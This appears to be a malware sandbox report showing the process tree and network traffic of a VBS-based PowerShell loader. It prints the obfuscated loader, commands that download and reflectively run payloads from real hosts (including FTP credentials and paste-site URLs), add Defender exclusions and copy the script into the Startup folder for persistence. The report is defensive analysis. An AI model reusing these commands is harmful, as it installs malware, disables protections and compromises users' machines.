'B1' + [char]65 + 'G4' + [char]65 + 'ZQBN' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'd' + [char]65 + 'By' + [char]65 + 'GE' + [char]65 + 'd' + [char]65 + 'BT' + [char]65 + 'Fw' + [char]65 + 'cwB3' + [char]65 + 'G8' + [char]65 + 'Z' + [char]65 + 'Bu' + [char]65 + 'Gk' + [char]65 + 'VwBc' + [char]65 + 'HQ' + [char]65 + 'ZgBv' + [char]65 + 'HM' + [char]65 + 'bwBy' + [char]65 + 'GM' + [char]65 + 'aQBN' + [char]65 + 'Fw' + [char]65 + 'ZwBu' + [char]65 + 'Gk' + [char]65 + 'bQBh' + [char]65 + 'G8' + [char]65 + 'UgBc' + [char]65 + 'GE' + [char]65 + 'd' + [char]65 + 'Bh' + [char]65 + 'EQ' + [char]65 + 'c' + [char]65 + 'Bw' + [char]65 + 'EE' + [char]65 + 'X' + [char]65 + '' + [char]65 + 'n' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'Kw' + [char]65 + 'g' + [char]65 + 'Fo' + [char]65 + 'SwBu' + [char]65 + 'Fk' + [char]65 + 'TQ' + [char]65 + 'k' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'K' + [char]65 + '' + [char]65 + 'g' + [char]65 + 'G4' + [char]65 + 'bwBp' + [char]65 + 'HQ' + [char]65 + 'YQBu' + [char]65 + 'Gk' + [char]65 + 'd' + [char]65 + 'Bz' + [char]65 + 'GU' + [char]65 + 'R' + [char]65 + '' + [char]65 + 't' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'Jw' + [char]65 + 'l' + [char]65 + 'Ek' + [char]65 + 'a' + [char]65 + 'Bx' + [char]65 + 'FI' + [char]65 + 'W' + [char]65 + '' + [char]65 + 'l' + [char]65 + 'Cc' + [char]65 + 'I' + [char]65 + 'Bt' + [char]65 + 'GU' + [char]65 + 'd' + [char]65 + 'BJ' + [char]65 + 'C0' + [char]65 + 'eQBw' + [char]65 + 'G8' + [char]65 + 'Qw' + [char]65 + 'g' + [char]65 + 'Ds' + [char]65 + 'I' + [char]65 + 'B0' + [char]65 + 'HI' + [char]65 + 'YQB0' + [char]65 + 'HM' + [char]65 + 'ZQBy' + [char]65 + 'G8' + [char]65 + 'bg' + [char]65 + 'v' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'd' + [char]65 + 'Bl' + [char]65 + 'Gk' + [char]65 + 'dQBx' + [char]65 + 'C8' + [char]65 + 'I' + [char]65 + 'BH' + [char]65 + 'GM' + [char]65 + 'VwBp' + [char]65 + 'FI' + [char]65 + 'I' + [char]65 + 'Bl' + [char]65 + 'Hg' + [char]65 + 'ZQ' + [char]65 + 'u' + [char]65 + 'GE' + [char]65 + 'cwB1' + [char]65 + 'Hc' + [char]65 + 'I' + [char]65 + 'Bl' + [char]65 + 'Hg' + [char]65 + 'ZQ' + [char]65 + 'u' + [char]65 + 'Gw' + [char]65 + 'b' + [char]65 + 'Bl' + [char]65 + 'Gg' + [char]65 + 'cwBy' + [char]65 + 'GU' + [char]65 + 'dwBv' + [char]65 + 'H' + [char]65 + '' + [char]65 + 'I' + [char]65 + '' + [char]65 + '7' + [char]65 + 'Ck' + [char]65 + 'JwB1' + [char]65 + 'HM' + [char]65 + 'bQ' + [char]65 + 'u' + [char]65 + 'G4' + [char]65 + 'aQB3' + [char]65 + 'H' + [char]65 + '' + [char]65 + 'VQBc' + [char]65 + 'Cc' + [char]65 + 'I' + [char]65 + '' + [char]65 + 'r' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'V' + [char]65 + 'By' + [char]65 + 'Eg' + [char]65 + 'VgB1' + [char]65 + 'CQ' + [char]65 + 'K' + [char]65 + '' + [char]65 + 'g' + [char]65 + 'D0' + [char]65 + 'I' + [char]65 + 'BH' + [char]65 + 'GM' + [char]65 + 'VwBp' + [char]65 + 'FI' + [char]65 + 'Ow' + [char]65 + 'p' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'ZQBt' + [char]65 + 'GE' + [char]65 + 'TgBy' + [char]65 + 'GU' + [char]65 + 'cwBV' + [char]65 + 'Do' + [char]65 + 'OgBd' + [char]65 + 'HQ' + [char]65 + 'bgBl' + [char]65 + 'G0' + [char]65 + 'bgBv' + [char]65 + 'HI' + [char]65 + 'aQB2' + [char]65 + 'G4' + [char]65 + 'RQBb' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'Kw' + [char]65 + 'g' + [char]65 + 'Cc' + [char]65 + 'X' + [char]65 + 'Bz' + [char]65 + 'HI' + [char]65 + 'ZQBz' + [char]65 + 'FU' + [char]65 + 'X' + [char]65 + '' + [char]65 + '6' + [char]65 + 'EM' + [char]65 + 'Jw' + [char]65 + 'o' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'PQ' + [char]65 + 'g' + [char]65 + 'Fo' + [char]65 + 'SwBu' + [char]65 + 'Fk' + [char]65 + 'TQ' + [char]65 + 'k' + [char]65 + 'Ds' + [char]65 + 'KQ' + [char]65 + 'n' + [char]65 + 'HU' + [char]65 + 'cwBt' + [char]65 + 'C4' + [char]65 + 'bgBp' + [char]65 + 'Hc' + [char]65 + 'c' + [char]65 + 'BV' + [char]65 + 'Fw' + [char]65 + 'Jw' + [char]65 + 'g' + [char]65 + 'Cs' + [char]65 + 'I' + [char]65 + 'BU' + [char]65 + 'HI' + [char]65 + 'S' + [char]65 + 'BW' + [char]65 + 'HU' + [char]65 + 'J' + [char]65 + '' + [char]65 + 'g' + [char]65 + 'Cw' + [char]65 + 'QgBL' + [char]65 + 'Ew' + [char]65 + 'UgBV' + [char]65 + 'CQ' + [char]65 + 'K' + [char]65 + 'Bl' + [char]65 + 'Gw' + [char]65 + 'aQBG' + [char]65 + 'GQ' + [char]65 + 'YQBv' + [char]65 + 'Gw' + [char]65 + 'bgB3' + [char]65 + 'G8' + [char]65 + 'R' + [char]65 + '' + [char]65 + 'u' + [char]65 + 'H' + [char]65 + '' + [char]65 + 'c' + [char]65 + 'Bl' + [char]65 + 'GY' + [char]65 + 'eQ' + [char]65 + 'k' + [char]65 + 'Ds' + [char]65 + 'O' + [char]65 + 'BG' + [char]65 + 'FQ' + [char]65 + 'VQ' + [char]65 + '6' + [char]65 + 'Do' + [char]65 + 'XQBn' + [char]65 + 'G4' + [char]65 + 'aQBk' + [char]65 + 'G8' + [char]65 + 'YwBu' + [char]65 + 'EU' + [char]65 + 'LgB0' + [char]65 + 'Hg' + [char]65 + 'ZQBU' + [char]65 + 'C4' + [char]65 + 'bQBl' + [char]65 + 'HQ' + [char]65 + 'cwB5' + [char]65 + 'FM' + [char]65 + 'Ww' + [char]65 + 'g' + [char]65 + 'D0' + [char]65 + 'I' + [char]65 + 'Bn' + [char]65 + 'G4' + [char]65 + 'aQBk' + [char]65 + 'G8' + [char]65 + 'YwBu' + [char]65 + 'EU' + [char]65 + 'LgBw' + [char]65 + 'H' + [char]65 + '' + [char]65 + 'ZQBm' + [char]65 + 'Hk' + [char]65 + 'J' + [char]65 + '' + [char]65 + '7' + [char]65 + 'Ck' + [char]65 + 'd' + [char]65 + 'Bu' + [char]65 + 'GU' + [char]65 + 'aQBs' + [char]65 + 'EM' + [char]65 + 'YgBl' + [char]65 + 'Fc' + [char]65 + 'LgB0' + [char]65 + 'GU' + [char]65 + 'Tg' + [char]65 + 'g' + [char]65 + 'HQ' + [char]65 + 'YwBl' + [char]65 + 'Go' + [char]65 + 'YgBP' + [char]65 + 'C0' + [char]65 + 'dwBl' + [char]65 + 'E4' + [char]65 + 'K' + [char]65 + '' + [char]65 + 'g' + [char]65 + 'D0' + [char]65 + 'I' + [char]65 + 'Bw' + [char]65 + 'H' + [char]65 + '' + [char]65 + 'ZQBm' + [char]65 + 'Hk' + [char]65 + 'J' + [char]65 + '' + [char]65 + '7' + [char]65 + 'H0' + [char]65 + 'Ow' + [char]65 + 'g' + [char]65 + 'Ck' + [char]65 + 'JwB0' + [char]65 + 'E8' + [char]65 + 'T' + [char]65 + 'Bj' + [char]65 + 'F8' + [char]65 + 'SwBh' + [char]65 + 'DM' + [char]65 + 'WgBm' + [char]65 + 'G8' + [char]65 + 'W' + [char]65 + '' + [char]65 + 'y' + [char]65 + 'Eo' + [char]65 + 'SgBy' + [char]65 + 'FY' + [char]65 + 'a' + [char]65 + 'Bt' + [char]65 + 'FY' + [char]65 + 'OQBj' + [char]65 + 'G0' + [char]65 + 'OQBY' + [char]65 + 'HM' + [char]65 + 'dQBY' + [char]65 + 'G0' + [char]65 + 'ag' + [char]65 + 'x' + [char]65 + 'Gc' + [char]65 + 'MQ' + [char]65 + 'n' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'Kw' + [char]65 + 'g' + [char]65 + 'Ek' + [char]65 + 'bwBx' + [char]65 + 'GE' + [char]65 + 'Rg' + [char]65 + 'k' + [char]65 + 'Cg' + [char]65 + 'I' + [char]65 + '' + [char]65 + '9' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'SQBv' + [char]65 + 'HE' + [char]65 + 'YQBG' + [char]65 + 'CQ' + [char]65 + 'ew' + [char]65 + 'g' + [char]65 + 'GU' + [char]65 + 'cwBs' + [char]65 + 'GU' + [char]65 + 'fQ' + [char]65 + '7' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'KQ' + [char]65 + 'n' + [char]65 + 'DI' + [char]65 + 'N' + [char]65 + 'B1' + [char]65 + 'Fg' + [char]65 + 'SgBU' + [char]65 + 'HE' + [char]65 + 'YQBt' + [char]65 + 'Gc' + [char]65 + 'eQBN' + [char]65 + 'HQ' + [char]65 + 'RgB6' + [char]65 + 'GE' + [char]65 + 'awBQ' + [char]65 + 'FI' + [char]65 + 'MQBx' + [char]65 + 'F8' + [char]65 + 'SQB2' + [char]65 + 'Ec' + [char]65 + 'aQBY' + [char]65 + 'E4' + [char]65 + 'Z' + [char]65 + 'Bx' + [char]65 + 'GE' + [char]65 + 'Tg' + [char]65 + 'x' + [char]65 + 'Cc' + [char]65 + 'I' + [char]65 + '' + [char]65 + 'r' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'SQBv' + [char]65 + 'HE' + [char]65 + 'YQBG' + [char]65 + 'CQ' + [char]65 + 'K' + [char]65 + '' + [char]65 + 'g' + [char]65 + 'D0' + [char]65 + 'I' + [char]65 + 'BJ' + [char]65 + 'G8' + [char]65 + 'cQBh' + [char]65 + 'EY' + [char]65 + 'J' + [char]65 + 'B7' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'KQ' + [char]65 + 'g' + [char]65 + 'HI' + [char]65 + 'bQBF' + [char]65 + 'Hc' + [char]65 + 'ag' + [char]65 + 'k' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'K' + [char]65 + '' + [char]65 + 'g' + [char]65 + 'GY' + [char]65 + 'aQ' + [char]65 + '7' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'KQ' + [char]65 + 'n' + [char]65 + 'DQ' + [char]65 + 'Ng' + [char]65 + 'n' + [char]65 + 'Cg' + [char]65 + 'cwBu' + [char]65 + 'Gk' + [char]65 + 'YQB0' + [char]65 + 'G4' + [char]65 + 'bwBD' + [char]65 + 'C4' + [char]65 + 'RQBS' + [char]65 + 'FU' + [char]65 + 'V' + [char]65 + 'BD' + [char]65 + 'EU' + [char]65 + 'V' + [char]65 + 'BJ' + [char]65 + 'Eg' + [char]65 + 'QwBS' + [char]65 + 'EE' + [char]65 + 'XwBS' + [char]65 + 'E8' + [char]65 + 'UwBT' + [char]65 + 'EU' + [char]65 + 'QwBP' + [char]65 + 'FI' + [char]65 + 'U' + [char]65 + '' + [char]65 + '6' + [char]65 + 'HY' + [char]65 + 'bgBl' + [char]65 + 'CQ' + [char]65 + 'I' + [char]65 + '' + [char]65 + '9' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'cgBt' + [char]65 + 'EU' + [char]65 + 'dwBq' + [char]65 + 'CQ' + [char]65 + 'Ow' + [char]65 + 'n' + [char]65 + 'D0' + [char]65 + 'Z' + [char]65 + 'Bp' + [char]65 + 'CY' + [char]65 + 'Z' + [char]65 + 'Bh' + [char]65 + 'G8' + [char]65 + 'b' + [char]65 + 'Bu' + [char]65 + 'Hc' + [char]65 + 'bwBk' + [char]65 + 'D0' + [char]65 + 'd' + [char]65 + 'By' + [char]65 + 'G8' + [char]65 + 'c' + [char]65 + 'B4' + [char]65 + 'GU' + [char]65 + 'PwBj' + [char]65 + 'HU' + [char]65 + 'LwBt' + [char]65 + 'G8' + [char]65 + 'Yw' + [char]65 + 'u' + [char]65 + 'GU' + [char]65 + 'b' + [char]65 + 'Bn' + [char]65 + 'G8' + [char]65 + 'bwBn' + [char]65 + 'C4' + [char]65 + 'ZQB2' + [char]65 + 'Gk' + [char]65 + 'cgBk' + [char]65 + 'C8' + [char]65 + 'Lw' + [char]65 + '6' + [char]65 + 'HM' + [char]65 + 'c' + [char]65 + 'B0' + [char]65 + 'HQ' + [char]65 + 'a' + [char]65 + '' + [char]65 + 'n' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'PQ' + [char]65 + 'g' + [char]65 + 'Ek' + [char]65 + 'bwBx' + [char]65 + 'GE' + [char]65 + 'Rg' + [char]65 + 'k' + [char]65 + 'Ds' + [char]65 + 'KQ' + [char]65 + 'g' + [char]65 + 'Cc' + [char]65 + 'dQBz' + [char]65 + 'G0' + [char]65 + 'LgBu' + [char]65 + 'Gk' + [char]65 + 'dwBw' + [char]65 + 'FU' + [char]65 + 'X' + [char]65 + '' + [char]65 + 'n' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'Kw' + [char]65 + 'g' + [char]65 + 'FQ' + [char]65 + 'cgBI' + [char]65 + 'FY' + [char]65 + 'dQ' + [char]65 + 'k' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'K' + [char]65 + '' + [char]65 + 'g' + [char]65 + 'Gw' + [char]65 + 'ZQBk' + [char]65 + 'Ds' + [char]65 + 'KQ' + [char]65 + 'o' + [char]65 + 'Gg' + [char]65 + 'd' + [char]65 + 'Bh' + [char]65 + 'F' + [char]65 + '' + [char]65 + 'c' + [char]65 + 'Bt' + [char]65 + 'GU' + [char]65 + 'V' + [char]65 + 'B0' + [char]65 + 'GU' + [char]65 + 'Rw' + [char]65 + '6' + [char]65 + 'Do' + [char]65 + 'XQBo' + [char]65 + 'HQ' + [char]65 + 'YQBQ' + [char]65 + 'C4' + [char]65 + 'TwBJ' + [char]65 + 'C4' + [char]65 + 'bQBl' + [char]65 + 'HQ' + [char]65 + 'cwB5' + [char]65 + 'FM' + [char]65 + 'Ww' + [char]65 + 'g' + [char]65 + 'D0' + [char]65 + 'I' + [char]65 + 'BU' + [char]65 + 'HI' + [char]65 + 'S' + [char]65 + 'BW' + [char]65 + 'HU' + [char]65 + 'J' + [char]65 + 'B7' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'KQ' + [char]65 + 'g' + [char]65 + 'Ew' + [char]65 + 'QQBy' + [char]65 + 'Hc' + [char]65 + 'Sg' + [char]65 + 'k' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'K' + [char]65 + '' + [char]65 + 'g' + [char]65 + 'GY' + [char]65 + 'aQ' + [char]65 + '7' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'KQ' + [char]65 + 'y' + [char]65 + 'Cg' + [char]65 + 'cwBs' + [char]65 + 'GE' + [char]65 + 'dQBx' + [char]65 + 'EU' + [char]65 + 'LgBy' + [char]65 + 'G8' + [char]65 + 'agBh' + [char]65 + 'E0' + [char]65 + 'LgBu' + [char]65 + 'G8' + [char]65 + 'aQBz' + [char]65 + 'HI' + [char]65 + 'ZQBW' + [char]65 + 'C4' + [char]65 + 'd' + [char]65 + 'Bz' + [char]65 + 'G8' + [char]65 + 'a' + [char]65 + '' + [char]65 + 'k' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'PQ' + [char]65 + 'g' + [char]65 + 'Ew' + [char]65 + 'QQBy' + [char]65 + 'Hc' + [char]65 + 'Sg' + [char]65 + 'k' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'Ow' + [char]65 + '=';$nvcbv = $qKKzc.replace('уЦϚ' , 'A') ;$acwwn = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String( $nvcbv ) ); $acwwn = $acwwn[-1..-$acwwn.Length] -join '';$acwwn = $acwwn.replace('%XRqhI%','C:\Users\Admin\AppData\Local\Temp\7d9aaab519a7c1247963967a928107516c36dae564a31c230dcc2ba6c9cb6b15.vbs');powershell $acwwn2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2432 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $JwrAL = $host.Version.Major.Equals(2) ;if ( $JwrAL ) {$uVHrT = [System.IO.Path]::GetTempPath();del ( $uVHrT + '\Upwin.msu' );$FaqoI = 'https://drive.google.com/uc?export=download&id=';$jwEmr = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $jwEmr ) {$FaqoI = ($FaqoI + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$FaqoI = ($FaqoI + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$yfepp = (New-Object Net.WebClient);$yfepp.Encoding = [System.Text.Encoding]::UTF8;$yfepp.DownloadFile($URLKB, $uVHrT + '\Upwin.msu');$MYnKZ = ('C:\Users\' + [Environment]::UserName );RiWcG = ($uVHrT + '\Upwin.msu'); powershell.exe wusa.exe RiWcG /quiet /norestart ; Copy-Item 'C:\Users\Admin\AppData\Local\Temp\7d9aaab519a7c1247963967a928107516c36dae564a31c230dcc2ba6c9cb6b15.vbs' -Destination ( $MYnKZ + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$lBCzSg;$mjdqf = (New-Object Net.WebClient);$mjdqf.Encoding = [System.Text.Encoding]::UTF8;$mjdqf.Credentials = new-object System.Net.NetworkCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),'developerpro21578Jp@@');$lBCzSg = $mjdqf.DownloadString( 'ftp://desckvbrat1@ftp.desckvbrat.com.br/Upcrypter/01/DLL01.txt' );$mjdqf.dispose();$mjdqf = (New-Object Net.WebClient);$mjdqf.Encoding = [System.Text.Encoding]::UTF8;$lBCzSg = $mjdqf.DownloadString( $lBCzSg );$huUPX = 'C:\Users\Admin\AppData\Local\Temp\7d9aaab519a7c1247963967a928107516c36dae564a31c230dcc2ba6c9cb6b15.vbs';[Byte[]] $acBcZ = [System.Convert]::FromBase64String( $lBCzSg.Replace( '↓:↓' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $acBcZ ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( 'txt.db/ssc/ezimotsuc/sedulcni-pw/moc.srekeesedutitarg.www//:sptth' , $huUPX , 'D DD' ) );};"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3308 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell $S = 'C:\Windows\System32\WindowsPowerShell\v1.0' ; Add-MpPreference -ExclusionPath $S -force ;4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2592
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell $S = 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe' ; Add-MpPreference -ExclusionPath $S -force ;4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1868
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c mkdir "C:\Users\Admin\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\"4⤵PID:1832
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ExecutionPolicy Bypass -file "C:\Users\Admin\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\\x2.ps1"4⤵
- Command and Scripting Interpreter: PowerShell
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1020
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\rnmzv.ps1"4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2880 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:4040
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\7d9aaab519a7c1247963967a928107516c36dae564a31c230dcc2ba6c9cb6b15.vbs"4⤵PID:3196
-
-
-
Network
-
Remote address:8.8.8.8:53Request196.249.167.52.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Requestftp.desckvbrat.com.brIN AResponseftp.desckvbrat.com.brIN CNAMEdesckvbrat.com.brdesckvbrat.com.brIN A191.252.83.213
-
Remote address:8.8.8.8:53Request64.159.190.20.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request95.221.229.192.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request213.83.252.191.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Requestpaste.eeIN AResponsepaste.eeIN A104.21.84.67paste.eeIN A172.67.187.200
-
Remote address:104.21.84.67:443RequestGET /d/A73sV/0 HTTP/1.1
Host: paste.ee
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Content-Type: text/plain; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: max-age=2592000
strict-transport-security: max-age=63072000
x-frame-options: DENY
x-content-type-options: nosniff
x-xss-protection: 1; mode=block
content-security-policy: default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://cdnjs.cloudflare.com https://www.google.com https://www.gstatic.com https://analytics.paste.ee; img-src 'self' https://secure.gravatar.com https://analytics.paste.ee data:; style-src 'self' 'unsafe-inline' https://fonts.googleapis.com https://cdnjs.cloudflare.com; font-src 'self' https://themes.googleusercontent.com https://fonts.gstatic.com; frame-src https://www.google.com; object-src 'none'
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vtDFcIvIGhtXQPOb5rH0Pzn3tBkMapmkH5hOmWQ%2F%2BrnRIsfpDhA0Xmv7taS%2BhgL7c56xBoeNDg53TJil1a9PJQCzOp%2Bau8tQGXyZNf%2BXNvDIbhqiX0TumTXqGQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8cd176041cabcd21-LHR
alt-svc: h3=":443"; ma=86400
-
Remote address:104.21.84.67:443RequestGET /d/g6QGg/0 HTTP/1.1
Host: paste.ee
ResponseHTTP/1.1 200 OK
Content-Type: text/plain; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: max-age=2592000
strict-transport-security: max-age=63072000
x-frame-options: DENY
x-content-type-options: nosniff
x-xss-protection: 1; mode=block
content-security-policy: default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://cdnjs.cloudflare.com https://www.google.com https://www.gstatic.com https://analytics.paste.ee; img-src 'self' https://secure.gravatar.com https://analytics.paste.ee data:; style-src 'self' 'unsafe-inline' https://fonts.googleapis.com https://cdnjs.cloudflare.com; font-src 'self' https://themes.googleusercontent.com https://fonts.gstatic.com; frame-src https://www.google.com; object-src 'none'
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=V%2B2Fd%2BEgDmZHTgof64AHBF1UKCN48m1v74f38jFjQ%2BWZucZ%2BGzY1cqeHstmlCXe7qICwrHRW9Tvz%2F4uo%2BYfI5XqS%2B3IffMGkhp%2F4fpw19va8BFURdJn%2Bd23JZg%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8cd176154b77cd21-LHR
alt-svc: h3=":443"; ma=86400
-
Remote address:104.21.84.67:443RequestGET /d/WdRMT/0 HTTP/1.1
Host: paste.ee
ResponseHTTP/1.1 200 OK
Content-Type: text/plain; charset=utf-8
Content-Length: 541
Connection: keep-alive
Cache-Control: max-age=2592000
strict-transport-security: max-age=63072000
x-frame-options: DENY
x-content-type-options: nosniff
x-xss-protection: 1; mode=block
content-security-policy: default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://cdnjs.cloudflare.com https://www.google.com https://www.gstatic.com https://analytics.paste.ee; img-src 'self' https://secure.gravatar.com https://analytics.paste.ee data:; style-src 'self' 'unsafe-inline' https://fonts.googleapis.com https://cdnjs.cloudflare.com; font-src 'self' https://themes.googleusercontent.com https://fonts.gstatic.com; frame-src https://www.google.com; object-src 'none'
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nJbkMBeVuKU8vclv9Jlm%2Bw1ATKhJ8fJoP3SlvUS%2FE6KCdWRat%2FRV08iXPq03nhUen54RN%2FAioEMnkV2L03XBqukn5VlPMfZrIFaALi4BemRsMWWjqow8pxxNBA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8cd17623dac5cd21-LHR
alt-svc: h3=":443"; ma=86400
-
Remote address:8.8.8.8:53Request67.84.21.104.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Requestwww.gratitudeseekers.comIN AResponsewww.gratitudeseekers.comIN CNAMEgratitudeseekers.comgratitudeseekers.comIN A173.231.247.100
-
Remote address:173.231.247.100:443RequestGET /wp-includes/customize/css/bd.txt HTTP/1.1
Host: www.gratitudeseekers.com
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Server: Apache
Last-Modified: Tue, 01 Oct 2024 10:57:16 GMT
Accept-Ranges: bytes
Content-Length: 658776
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/plain
-
Remote address:8.8.8.8:53Request100.247.231.173.in-addr.arpaIN PTRResponse100.247.231.173.in-addr.arpaIN PTRvps75292inmotionhostingcom
-
Remote address:8.8.8.8:53Requestpastebin.comIN AResponsepastebin.comIN A172.67.19.24pastebin.comIN A104.20.4.235pastebin.comIN A104.20.3.235
-
Remote address:172.67.19.24:443RequestGET /raw/pQQ0n3eA HTTP/1.1
Host: pastebin.com
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Content-Type: text/plain; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
x-frame-options: DENY
x-content-type-options: nosniff
x-xss-protection: 1;mode=block
cache-control: public, max-age=1801
CF-Cache-Status: HIT
Age: 664
Last-Modified: Fri, 04 Oct 2024 01:28:58 GMT
Server: cloudflare
CF-RAY: 8cd1762adf109483-LHR
-
Remote address:8.8.8.8:53Request24.19.67.172.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request149.220.183.52.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request53.210.109.20.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request206.23.85.13.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request240.221.184.93.in-addr.arpaIN PTRResponse
-
1.0kB 1.3kB 20 17
-
190 B 154 B 4 3
-
3.7kB 116.7kB 70 126
HTTP Request
GET https://paste.ee/d/A73sV/0HTTP Response
200HTTP Request
GET https://paste.ee/d/g6QGg/0HTTP Response
200HTTP Request
GET https://paste.ee/d/WdRMT/0HTTP Response
200 -
190 B 154 B 4 3
-
173.231.247.100:443https://www.gratitudeseekers.com/wp-includes/customize/css/bd.txttls, httppowershell.exe17.7kB 686.7kB 351 498
HTTP Request
GET https://www.gratitudeseekers.com/wp-includes/customize/css/bd.txtHTTP Response
200 -
190 B 154 B 4 3
-
726 B 3.8kB 8 8
HTTP Request
GET https://pastebin.com/raw/pQQ0n3eAHTTP Response
200 -
260 B 200 B 5 5
-
260 B 200 B 5 5
-
260 B 200 B 5 5
-
260 B 200 B 5 5
-
260 B 200 B 5 5
-
260 B 200 B 5 5
-
260 B 200 B 5 5
-
260 B 200 B 5 5
-
260 B 200 B 5 5
-
260 B 200 B 5 5
-
260 B 200 B 5 5
-
260 B 200 B 5 5
-
260 B 200 B 5 5
-
260 B 200 B 5 5
-
260 B 200 B 5 5
-
260 B 200 B 5 5
-
260 B 200 B 5 5
-
260 B 200 B 5 5
-
260 B 200 B 5 5
-
